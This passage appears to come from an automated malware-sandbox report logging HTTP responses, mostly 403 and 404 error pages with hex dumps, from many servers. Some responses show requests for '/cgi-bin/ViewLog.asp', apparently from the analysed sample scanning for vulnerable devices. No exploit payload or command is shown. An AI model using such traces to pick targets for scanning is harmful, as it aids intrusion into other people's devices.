62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 25 Feb 2024 18:04:02 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlVary: OriginVary: Accept-EncodingX-Cache: SKIP ONLYGETDate: Sun, 25 Feb 2024 18:04:05 GMTContent-Length: 59Connection: closeData Raw: 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 74 20 46 6f 75 6e 64 22 5d 7d 0a Data Ascii: {"code":404,"message":"Not Found","details":["Not Found"]}
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 50Content-Type: text/htmlData Raw: 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 4e 6f 20 63 6f 6e 74 65 78 74 20 66 6f 75 6e 64 20 66 6f 72 20 72 65 71 75 65 73 74 Data Ascii: <h1>404 Not Found</h1>No context found for request
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Jan 1970 10:59:01 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 25 Feb 2024 18:04:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Sun, 25 Feb 2024 18:04:13 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Boa/0.94.13Date: Sun, 25 Feb 2024 18:04:31 GMTContent-Type: text/htmlContent-Length: 126Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sun, 25 Feb 2024 18:04:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 0a 1a a1 49 a5 79 25 a5 9a c8 6a f5 61 a6 eb 43 5d 06 00 37 d7 58 cc a2 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 7b(HML),I310Q/Qp/K&T$dCAfAyyyzzIy%jaC]7X0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 19:48:56 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=10, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 25 Feb 2024 19:03:51 GMTConnection: closeContent-Length: 326Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 35 30 33 2e 20 54 68 65 20 73 65 72 76 69 63 65 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Service Unavailable</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Service Unavailable</h2><hr><p>HTTP Error 503. The service is unavailable.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sun, 25 Feb 2024 18:04:38 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: gunicornDate: Sun, 25 Feb 2024 18:04:42 GMTConnection: closeContent-Type: text/html; charset=utf-8X-Frame-Options: DENYContent-Length: 179X-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origin
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpdContent-Type: text/html; charset=iso-8859-1Date: Sun, 25 Feb 2024 18:04:54 GMTLast-Modified: Sun, 25 Feb 2024 18:04:54 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 6c 6f 63 61 6c 68 6f 73 74 22 3e 74 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H2>404 Not Found</H2>The requested URL '/cgi-bin/ViewLog.asp' was not found on this server.<HR><ADDRESS><A HREF="http://localhost">thttpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 25 Feb 2024 18:05:01 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 25 Feb 2024 18:05:11 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=utf-8server: Rocketpermissions-policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=()x-content-type-options: nosniffx-frame-options: SAMEORIGINreferrer-policy: same-originx-xss-protection: 0content-security-policy: default-src 'self'; base-uri 'self'; form-action 'self'; object-src 'self' blob:; script-src 'self' 'wasm-unsafe-eval'; style-src 'self' 'unsafe-inline'; child-src 'self' https://.duosecurity.com https://.duofederal.com; frame-src 'self' https://.duosecurity.com https://.duofederal.com; frame-ancestors 'self' chrome-extension://nngceckbapebfimnlniiiahkandclblb chrome-extension://jbkfoedolllekgbhcbcoahefnbanhhlh moz-extension://* ; img-src 'self' data: https://haveibeenpwned.com https://www.gravatar.com ; connect-src 'self' https://api.pwnedpasswords.com https://api.2fa.directory https://app.simplelData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 26 Feb 2024 04:01:17 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sun, 25 Feb 2024 18:05:22 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sun, 25 Feb 2024 18:05:23 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Feb 2024 18:05:24 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Fri, 13 Feb 1970 07:48:24 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A 